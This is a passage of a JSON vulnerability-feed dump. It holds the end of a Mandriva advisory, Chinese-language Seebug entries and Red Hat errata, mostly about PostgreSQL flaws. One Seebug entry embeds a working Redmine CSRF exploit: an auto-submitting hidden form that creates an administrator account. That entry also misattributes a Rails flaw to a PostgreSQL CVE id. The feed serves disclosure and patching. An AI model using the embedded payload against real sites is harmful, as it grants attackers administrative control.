mes5/i586/postgresql8.3-server-8.3.9-0.1mdvmes5.i586.rpm \r\n a71b64c6243bc5302fd20a09b6f209a7 mes5/SRPMS/postgresql8.3-8.3.9-0.1mdvmes5.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n af91e508191f984255fcca2cc4847dd5 mes5/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 2a9f7ddd1c6b1df8fbaed9f75855d215 mes5/x86_64/lib64pq8.3_5-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 5a99bffb08073b986c113f4e01290acb mes5/x86_64/postgresql8.3-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 34a240a407e23e22fa4fafcacd42aaa4 mes5/x86_64/postgresql8.3-contrib-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 328ffce47393a37b8513ca4db35cfa0e mes5/x86_64/postgresql8.3-devel-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 2813c49a1081e9ba21641ff0221c0282 mes5/x86_64/postgresql8.3-docs-8.3.9-0.1mdvmes5.x86_64.rpm\r\n ae7edc79dfcbe71b63d3cc63002b999e mes5/x86_64/postgresql8.3-pl-8.3.9-0.1mdvmes5.x86_64.rpm\r\n b329ee3b0bf6f225d63967194a9ad1f7 mes5/x86_64/postgresql8.3-plperl-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 3357aeaff40947216df472606af69f92 mes5/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 2d1643ae72848a853075a348c3e710b1 mes5/x86_64/postgresql8.3-plpython-8.3.9-0.1mdvmes5.x86_64.rpm\r\n e190019db4c20a65fbcb6ec71b87fb73 mes5/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 95397048806b12338bf90c216f93f8c6 mes5/x86_64/postgresql8.3-server-8.3.9-0.1mdvmes5.x86_64.rpm \r\n a71b64c6243bc5302fd20a09b6f209a7 mes5/SRPMS/postgresql8.3-8.3.9-0.1mdvmes5.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFLJ6UdmqjQ0CJFipgRAhI0AKDu7P9IZkttVPb8P6UTShYJa6HLxgCcC6JU\r\nwNWFQRVDjFT4KODLej6slSQ=\r\n=9pvm\r\n-----END PGP SIGNATURE-----", "modified": "2009-12-15T00:00:00", "published": "2009-12-15T00:00:00", "id": "SECURITYVULNS:DOC:22944", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22944", "title": "[ MDVSA-2009:333 ] postgresql", "type": "securityvulns", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:28:18", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 37334\r\nCVE ID: CVE-2009-4034\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u9ad8\u7ea7\u5bf9\u8c61\uff0d\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\r\nPostgreSQL\u6ca1\u6709\u6b63\u786e\u5730\u9a8c\u8bc1X.509\u8bc1\u4e66\u4e3b\u9898\u7684\u901a\u7528\u540d\u79f0\uff08CN\uff09\u5b57\u7b26\u7684\u57df\u540d\u4e2d\u7684\u7a7a\u5b57\u7b26\uff08\\0\uff09\uff0c\u5728\u5904\u7406\u5305\u542b\u6709\u7a7a\u5b57\u7b26\u7684\u8bc1\u4e66\u5b57\u6bb5\u65f6\u9519\u8bef\u5730\u5c06\u7a7a\u5b57\u7b26\u5904\u7406\u4e3a\u622a\u6b62\u5b57\u7b26\uff0c\u56e0\u6b64\u53ea\u4f1a\u9a8c\u8bc1\u7a7a\u5b57\u7b26\u524d\u7684\u90e8\u5206\u3002\u4f8b\u5982\uff0c\u5bf9\u4e8e\u7c7b\u4f3c\u4e8e\u4ee5\u4e0b\u7684\u540d\u79f0\uff1a\r\n\r\n example.com\\0.haxx.se\r\n\r\n\u8bc1\u4e66\u662f\u53d1\u5e03\u7ed9haxx.se\u7684\uff0c\u4f46PostgreSQL\u9519\u8bef\u7684\u9a8c\u8bc1\u7ed9example.com\uff0c\u8fd9\u5141\u8bb8\u653b\u51fb\u8005\u901a\u8fc7\u5408\u6cd5CA\u6240\u53d1\u5e03\u7684\u7279\u5236\u670d\u52a1\u5668\u8bc1\u4e66\u4f2a\u9020\u6210\u4e3a\u4efb\u610f\u57fa\u4e8eSSL\u7684PostgreSQL\u670d\u52a1\u5668\u6267\u884c\u4e2d\u95f4\u4eba\u653b\u51fb\uff0c\u6216\u7ed5\u8fc7\u9884\u671f\u7684\u5ba2\u6237\u7aef-\u4e3b\u673a\u540d\u9650\u5236\u3002\n\nPostgreSQL PostgreSQL 8.4.x\r\nPostgreSQL PostgreSQL 8.3.x\r\nPostgreSQL PostgreSQL 8.2.x\r\nPostgreSQL PostgreSQL 8.1.x\r\nPostgreSQL PostgreSQL 8.0.x\r\nPostgreSQL PostgreSQL 7.4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPostgreSQL\r\n----------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.postgresql.org/about/news.1170\r\n\r\nSun\r\n---\r\nSun\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08Sun-Alert-6909139\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nSun-Alert-6909139\uff1aSecurity Vulnerabilities in PostgreSQL Shipped With Solaris May Allow Escalation of Privileges or Man-in-the-Middle on SSL Connections\r\n\u94fe\u63a5\uff1ahttp://sunsolve.sun.com/search/document.do?assetkey=1-66-274870-1", "modified": "2009-12-29T00:00:00", "published": "2009-12-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15154", "id": "SSV:15154", "type": "seebug", "title": "PostgreSQL CA SSL\u8bc1\u4e66\u9a8c\u8bc1\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:25:04", "bulletinFamily": "exploit", "description": "Bugraq ID: 37334\r\nCVE ID\uff1aCVE-2009-4034\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u5bf9\u8c61\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\u5904\u7406\u90e8\u5206\u8bc1\u4e66\u5b57\u6bb5\u4e2d\u5d4c\u5165\u7a7a\u5b57\u7b26\u7684SSL\u8bc1\u4e66\u5b58\u5728\u9519\u8bef\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4f2a\u9020\u8bc1\u4e66\uff0c\u8fdb\u884c\u4e2d\u95f4\u4eba\u7b49\u653b\u51fb\u3002\r\nSSL\u8bc1\u4e66\u4e2d\u7684\u7a7a\u5b57\u7b26\u53ef\u7528\u4e8e\u4f2a\u9020\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u7aef\u9a8c\u8bc1\uff0c\u53ea\u5f71\u54cd\u542f\u7528\u4e86SSL\uff0c\u6267\u884c\u8bc1\u4e66\u540d\u6821\u9a8c\u6216\u5ba2\u6237\u7aef\u8bc1\u4e66\u9a8c\u8bc1\uff0c\u800c\u5176CA\u5df2\u7ecf\u88ab\u8bf1\u9a97\u53d1\u5e03\u4e86\u975e\u6cd5\u8bc1\u4e66\u7684\u7528\u6237\u3002\n\nPostgreSQL PostgreSQL 8.4.1 \r\nPostgreSQL PostgreSQL 8.3.8 \r\nPostgreSQL PostgreSQL 8.3.6 \r\nPostgreSQL PostgreSQL 8.2.14 \r\nPostgreSQL PostgreSQL 8.2.6 \r\nPostgreSQL PostgreSQL 8.2.4 \r\nPostgreSQL PostgreSQL 8.2.3 \r\nPostgreSQL PostgreSQL 8.2.2 \r\nPostgreSQL PostgreSQL 8.2 \r\nPostgreSQL PostgreSQL 8.1.18 \r\nPostgreSQL PostgreSQL 8.1.11 \r\nPostgreSQL PostgreSQL 8.1.9 \r\nPostgreSQL PostgreSQL 8.1.8 \r\nPostgreSQL PostgreSQL 8.1.5 \r\nPostgreSQL PostgreSQL 8.1.4 \r\nPostgreSQL PostgreSQL 8.1.3 \r\nPostgreSQL PostgreSQL 8.1.1 \r\nPostgreSQL PostgreSQL 8.0.22 \r\nPostgreSQL PostgreSQL 8.0.15 \r\nPostgreSQL PostgreSQL 8.0.13 \r\nPostgreSQL PostgreSQL 8.0.9 \r\nPostgreSQL PostgreSQL 8.0.8 \r\nPostgreSQL PostgreSQL 8.0.7 \r\nPostgreSQL PostgreSQL 8.0.5 \r\nPostgreSQL PostgreSQL 8.0.4 \r\nPostgreSQL PostgreSQL 8.0.3 \r\nPostgreSQL PostgreSQL 8.0.2 \r\nPostgreSQL PostgreSQL 8.0.1 \r\nPostgreSQL PostgreSQL 8.0 \r\nPostgreSQL PostgreSQL 7.4.26 \r\nPostgreSQL PostgreSQL 7.4.19 \r\nPostgreSQL PostgreSQL 7.4.17 \r\nPostgreSQL PostgreSQL 7.4.14 \r\nPostgreSQL PostgreSQL 7.4.13 \r\nPostgreSQL PostgreSQL 7.4.12 \r\nPostgreSQL PostgreSQL 7.4.11 \r\nPostgreSQL PostgreSQL 7.4.10 \r\nPostgreSQL PostgreSQL 7.4.9 \r\nPostgreSQL PostgreSQL 7.4.8 \r\nPostgreSQL PostgreSQL 7.4.7 \r\nPostgreSQL PostgreSQL 7.4.6 \r\nPostgreSQL PostgreSQL 7.4.5 \r\nPostgreSQL PostgreSQL 7.4.4 \r\nPostgreSQL PostgreSQL 7.4.3 \r\nPostgreSQL PostgreSQL 7.4.2 \r\nPostgreSQL PostgreSQL 7.4.1 \r\nPostgreSQL PostgreSQL 7.4 \r\nPostgreSQL PostgreSQL 8.4\r\nPostgreSQL PostgreSQL 8.3\r\nPostgreSQL PostgreSQL 8.1.7\r\nPostgreSQL PostgreSQL 8.0.11\r\nPostgreSQL PostgreSQL 7.4.16\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\nhttp://www.postgresql.org/about/news.1170", "modified": "2009-12-17T00:00:00", "published": "2009-12-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15096", "id": "SSV:15096", "type": "seebug", "title": "PostgreSQL\u7a7a\u5b57\u7b26CA SSL\u6574\u6570\u6821\u9a8c\u5b89\u5168\u7ed5\u8fc7\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:25:04", "bulletinFamily": "exploit", "description": "Bugraq ID: 37333\r\nCVE ID\uff1aCVE-2009-4136\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u5bf9\u8c61\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\u7d22\u5f15\u51fd\u6570\u4e2d\u5904\u7406\u4f1a\u8bdd\u72b6\u6001\u66f4\u6539\u5b58\u5728\u4e00\u4e2a\u9519\u8bef\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u63d0\u5347\u7279\u6743\u3002\n\nPostgreSQL PostgreSQL 8.4.1 \r\nPostgreSQL PostgreSQL 8.3.8 \r\nPostgreSQL PostgreSQL 8.3.6 \r\nPostgreSQL PostgreSQL 8.2.14 \r\nPostgreSQL PostgreSQL 8.2.6 \r\nPostgreSQL PostgreSQL 8.2.4 \r\nPostgreSQL PostgreSQL 8.2.3 \r\nPostgreSQL PostgreSQL 8.2.2 \r\nPostgreSQL PostgreSQL 8.2 \r\nPostgreSQL PostgreSQL 8.1.18 \r\nPostgreSQL PostgreSQL 8.1.11 \r\nPostgreSQL PostgreSQL 8.1.9 \r\nPostgreSQL PostgreSQL 8.1.8 \r\nPostgreSQL PostgreSQL 8.1.5 \r\nPostgreSQL PostgreSQL 8.1.4 \r\nPostgreSQL PostgreSQL 8.1.3 \r\nPostgreSQL PostgreSQL 8.1.1 \r\nPostgreSQL PostgreSQL 8.0.22 \r\nPostgreSQL PostgreSQL 8.0.15 \r\nPostgreSQL PostgreSQL 8.0.13 \r\nPostgreSQL PostgreSQL 8.0.9 \r\nPostgreSQL PostgreSQL 8.0.8 \r\nPostgreSQL PostgreSQL 8.0.7 \r\nPostgreSQL PostgreSQL 8.0.5 \r\nPostgreSQL PostgreSQL 8.0.4 \r\nPostgreSQL PostgreSQL 8.0.3 \r\nPostgreSQL PostgreSQL 8.0.2 \r\nPostgreSQL PostgreSQL 8.0.1 \r\nPostgreSQL PostgreSQL 8.0 \r\nPostgreSQL PostgreSQL 7.4.26 \r\nPostgreSQL PostgreSQL 7.4.19 \r\nPostgreSQL PostgreSQL 7.4.17 \r\nPostgreSQL PostgreSQL 7.4.14 \r\nPostgreSQL PostgreSQL 7.4.13 \r\nPostgreSQL PostgreSQL 7.4.12 \r\nPostgreSQL PostgreSQL 7.4.11 \r\nPostgreSQL PostgreSQL 7.4.10 \r\nPostgreSQL PostgreSQL 7.4.9 \r\nPostgreSQL PostgreSQL 7.4.8 \r\nPostgreSQL PostgreSQL 7.4.7 \r\nPostgreSQL PostgreSQL 7.4.6 \r\nPostgreSQL PostgreSQL 7.4.5 \r\nPostgreSQL PostgreSQL 7.4.4 \r\nPostgreSQL PostgreSQL 7.4.3 \r\nPostgreSQL PostgreSQL 7.4.2 \r\nPostgreSQL PostgreSQL 7.4.1 \r\nPostgreSQL PostgreSQL 7.4 \r\nPostgreSQL PostgreSQL 8.4\r\nPostgreSQL PostgreSQL 8.3\r\nPostgreSQL PostgreSQL 8.1.7\r\nPostgreSQL PostgreSQL 8.0.11\r\nPostgreSQL PostgreSQL 7.4.16\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\nhttp://www.postgresql.org/about/news.1170", "modified": "2009-12-17T00:00:00", "published": "2009-12-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15095", "id": "SSV:15095", "type": "seebug", "title": "PostgreSQL\u7d22\u5f15\u51fd\u6570\u4f1a\u8bdd\u72b6\u6001\u4fee\u6539\u672c\u5730\u7279\u6743\u63d0\u5347\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:18:01", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 37333\r\nCVE ID: CVE-2009-4136\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u9ad8\u7ea7\u5bf9\u8c61\uff0d\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\r\nPostgreSQL\u5728\u6267\u884c\u6570\u636e\u5e93\u8d85\u7ea7\u7528\u6237\u7684\u7d22\u5f15\u529f\u80fd\u671f\u95f4\u6ca1\u6709\u6b63\u786e\u5730\u7ba1\u7406session-local\u72b6\u6001\uff0c\u8fd9\u5141\u8bb8\u901a\u8fc7\u8ba4\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u5e26\u6709\u7279\u5236\u7d22\u5f15\u529f\u80fd\u7684\u8868\u683c\u83b7\u5f97\u6743\u9650\u63d0\u5347\u3002\n\nPostgreSQL PostgreSQL 8.4.x\r\nPostgreSQL PostgreSQL 8.3.x\r\nPostgreSQL PostgreSQL 8.2.x\r\nPostgreSQL PostgreSQL 8.1.x\r\nPostgreSQL PostgreSQL 8.0.x\r\nPostgreSQL PostgreSQL 7.4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPostgreSQL\r\n----------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.postgresql.org/about/news.1170\r\n\r\nSun\r\n---\r\nSun\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08Sun-Alert-6909139\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nSun-Alert-6909139\uff1aSecurity Vulnerabilities in PostgreSQL Shipped With Solaris May Allow Escalation of Privileges or Man-in-the-Middle on SSL Connections\r\n\u94fe\u63a5\uff1ahttp://sunsolve.sun.com/search/document.do?assetkey=1-66-274870-1", "modified": "2009-12-29T00:00:00", "published": "2009-12-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15153", "id": "SSV:15153", "title": "PostgreSQL\u7d22\u5f15\u529f\u80fd\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:25:04", "bulletinFamily": "exploit", "description": "Bugraq ID: 37322\r\nCVE ID\uff1aCVE-2009-4136\r\n\r\nRuby on Rails\u662f\u4e00\u6b3eWeb\u5e94\u7528\u7a0b\u5e8f\u6846\u67b6\uff0c\u6784\u5efa\u5728Ruby\u8bed\u8a00\u4e4b\u4e0a\u3002\r\nRuby on Rails 'protect_from_forgery'\u5b58\u5728\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u653b\u51fb\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u6267\u884c\u90e8\u5206\u7ba1\u7406\u5458\u64cd\u4f5c\uff0c\u83b7\u5f97\u5bf9\u5e94\u7528\u7a0b\u5e8f\u7684\u672a\u6388\u6743\u8bbf\u95ee\u6216\u5220\u9664\u90e8\u5206\u6570\u636e\u3002\n\nRuby on Rails Ruby on Rails 2.3.5 \r\nRuby on Rails Ruby on Rails 2.3.4 \r\nRuby on Rails Ruby on Rails 2.3.3 \r\nRuby on Rails Ruby on Rails 2.3.2 \r\nRuby on Rails Ruby on Rails 2.2.3 \r\nRuby on Rails Ruby on Rails 2.2.2 \r\nRuby on Rails Ruby on Rails 2.1.1 \r\nRuby on Rails Ruby on Rails 2.1 \r\nRuby on Rails Ruby on Rails 2.0.5 \r\nRuby on Rails Ruby on Rails 2.0.4 \r\nRuby on Rails Ruby on Rails 2.0 \r\nRuby on Rails Ruby on Rails 1.2.6 \r\nRuby on Rails Ruby on Rails 1.2.5 \r\nRuby on Rails Ruby on Rails 1.2.3 \r\nRuby on Rails Ruby on Rails 1.1.6 \r\nRuby on Rails Ruby on Rails 1.1.5 \r\nRuby on Rails Ruby on Rails 1.1.4 \r\nRuby on Rails Ruby on Rails 1.1.3 \r\nRuby on Rails Ruby on Rails 1.1.2 \r\nRuby on Rails Ruby on Rails 1.1.1 \r\nRuby on Rails Ruby on Rails 1.1 \r\nRuby on Rails Ruby on Rails 1.0\r\nRuby on Rails Ruby on Rails 0.14\r\nRuby on Rails Ruby on Rails 0.13\r\nRedmine Redmine 0.8.7 \r\nRedmine Redmine 0.8.6 \r\nRedmine Redmine 0.8.5 \r\nRedmine Redmine 0.7.3 \r\nRedmine Redmine 0.7.2\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\u63d0\u4f9b\uff1a\r\nhttp://www.rubyonrails.com/\r\nhttp://www.redmine.org/", "modified": "2009-12-17T00:00:00", "published": "2009-12-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15097", "id": "SSV:15097", "type": "seebug", "title": "Ruby on Rails 'protect_from_forgery'\u8de8\u7ad9\u811a\u672c\u8bf7\u6c42\u4f2a\u9020\u6f0f\u6d1e", "sourceData": "\n /**\r\n* Redmine &lt;= 0.8.6 CSRF Add Admin User Exploit\r\n* Discovered by: p0deje (http://p0deje.blogspot.com)\r\n* Application: http://www.redmine.org/wiki/redmine/Download\r\n* SA: http://www.redmine.org/news/30\r\n* Date: 13.11.2009\r\n* Versions affected: &lt;= 0.8.6\r\n* Description: this is a simple exploit which exploits CSRF vulnerability in Redmine, it creates user account with adminstartive rights\r\n*/\r\n \r\n&lt;html&gt;\r\n&lt;body&gt;\r\n &lt;form method=POST action=&quot;http://www.example.com/users/new&quot;&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;text&quot; value=&quot;hacker&quot; size=&quot;25&quot; name=&quot;user[login]&quot; id=&quot;user_login&quot;/&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;text&quot; value=&quot;hacker&quot; size=&quot;30&quot; name=&quot;user[firstname]&quot; id=&quot;user_firstname&quot;/&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;text&quot; value=&quot;hacker&quot; size=&quot;30&quot; name=&quot;user[lastname]&quot; id=&quot;user_lastname&quot;/&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;text&quot; value=&quot;hacker@hacker.com&quot; size=&quot;30&quot; name=&quot;user[mail]&quot; id=&quot;user_mail&quot;/&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;password&quot; size=&quot;25&quot; name=&quot;password&quot; id=&quot;password&quot; value=&quot;hacker&quot; /&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;password&quot; size=&quot;25&quot; name=&quot;password_confirmation&quot; id=&quot;password_confirmation&quot; value=&quot;hacker&quot; /&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;checkbox&quot; value=&quot;1&quot; name=&quot;user[admin]&quot; id=&quot;user_admin&quot;/&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;hidden&quot; value=&quot;1&quot; name=&quot;user[admin]&quot;/&gt;\r\n &lt;input style=&quot;display: none&quot; type=&quot;submit&quot; value=&quot;Create&quot; id=&quot;commit&quot; name=&quot;commit&quot; /&gt;\r\n &lt;/form&gt;\r\n &lt;script&gt;document.getElementById(&quot;commit&quot;).click();&lt;/script&gt;\r\n&lt;/body&gt;\r\n&lt;/html&gt;\r\n \r\n/**\r\n* P.S. Actually, this vulnerability wasn&#039;t fixed in Redmine 0.8.7, because token was generated one time for all the pages and allthe users.\r\n* Thus, you can add POST data with token of any user and exploit will be working again\r\n*/\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15097", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T17:44:10", "bulletinFamily": "unix", "description": "PostgreSQL is an advanced object-relational database management system\n(DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\nPerl and Tcl languages, and are installed in trusted mode by default. In\ntrusted mode, certain operations, such as operating system level access,\nare restricted.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Perl. If the PL/Perl procedural language was\nregistered on a particular database, an authenticated database user running\na specially-crafted PL/Perl script could use this flaw to bypass intended\nPL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\nscripts with the privileges of the database server. (CVE-2010-1169)\n\nRed Hat would like to thank Tim Bunce for responsibly reporting the\nCVE-2010-1169 flaw.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Tcl. If the PL/Tcl procedural language was registered\non a particular database, an authenticated database user running a\nspecially-crafted PL/Tcl script could use this flaw to bypass intended\nPL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\nscripts with the privileges of the database server. (CVE-2010-1170)\n\nA buffer overflow flaw was found in the way PostgreSQL retrieved a\nsubstring from the bit string for BIT() and BIT VARYING() SQL data types.\nAn authenticated database user running a specially-crafted SQL query could\nuse this flaw to cause a temporary denial of service (postgres daemon\ncrash) or, potentially, execute arbitrary code with the privileges of the\ndatabase server. (CVE-2010-0442)\n\nAn integer overflow flaw was found in the way PostgreSQL used to calculate\nthe size of the hash table for joined relations. An authenticated database\nuser could create a specially-crafted SQL query which could cause a\ntemporary denial of service (postgres daemon crash) or, potentially,\nexecute arbitrary code with the privileges of the database server.\n(CVE-2010-0733)\n\nPostgreSQL improperly protected session-local state during the execution of\nan index function by a database superuser during the database maintenance\noperations. An authenticated database user could use this flaw to elevate\ntheir privileges via specially-crafted index functions. (CVE-2009-4136)\n\nThese packages upgrade PostgreSQL to version 8.1.21. Refer to the\nPostgreSQL Release Notes for a list of changes:\n\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nAll PostgreSQL users are advised to upgrade to these updated packages,\nwhich correct these issues. If the postgresql service is running, it will\nbe automatically restarted after installing this update.\n", "modified": "2017-09-08T12:16:35", "published": "2010-05-19T04:00:00", "id": "RHSA-2010:0429", "href": "https://access.redhat.com/errata/RHSA-2010:0429", "type": "redhat", "title": "(RHSA-2010:0429) Moderate: postgresql security update", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:32", "bulletinFamily": "unix", "description": "PostgreSQL is an advanced object-relational database management system\n(DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\nPerl and Tcl languages, and are installed in trusted mode by default. In\ntrusted mode, certain operations, such as operating system level access,\nare restricted.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Perl. If the PL/Perl procedural language was\nregistered on a particular database, an authenticated database user running\na specially-crafted PL/Perl script could use this flaw to bypass intended\nPL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\nscripts with the privileges of the database server. (CVE-2010-1169)\n\nRed Hat would like to thank Tim Bunce for responsibly reporting the\nCVE-2010-1169 flaw.\n\nA flaw was found in the way PostgreSQL enforced permission checks on\nscripts written in PL/Tcl. If the PL/Tcl procedural language was registered\non a particular database, an authenticated database user running a\nspecially-crafted PL/Tcl script could use this flaw to bypass intended\nPL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\nscripts with the privileges of the database server. (CVE-2010-1170)\n\nA buffer overflow flaw was found in the way PostgreSQL retrieved a\nsubstring from the bit string for BIT() and BIT VARYING() SQL data types.\nAn authenticated database user running a specially-crafted SQL query could\nuse this flaw to cause a temporary denial of service (postgres daemon\ncrash) or, potentially, execute arbitrary code with the privileges of the\ndatabase server. (CVE-2010-0442)\n\nAn integer overflow flaw was found in the way PostgreSQL used to calculate\nthe size of the hash table for joined relations. An authenticated database\nuser could create a specially-crafted SQL query which could cause a\ntemporary denial of service (postgres daemon crash) or, potentially,\nexecute arbitrary code with the privileges of the database server.\n(CVE-2010-0733)\n\nPostgreSQL improperly protected session-local state during the execution of\nan index function by a database superuser during the database maintenance\noperations. An authenticated database user could use this flaw to elevate\ntheir privileges via specially-crafted index functions. (CVE-2009-4136)\n\nAll PostgreSQL users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. Running\nPostgreSQL instances must be restarted (\"service rhdb restart\") for this\nupdate to take effect.\n", "modified": "2018-05-26T04:26:17", "published": "2010-05-19T04:00:00", "id": "RHSA-2010:0427", "href": "https://access.redhat.com/errata/RHSA-2010:0427", "type": "redhat", "title": "(RHSA-2010:0427) Moderate: postgresql security update", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:43:06", "bulletinFamily": "unix", "description": 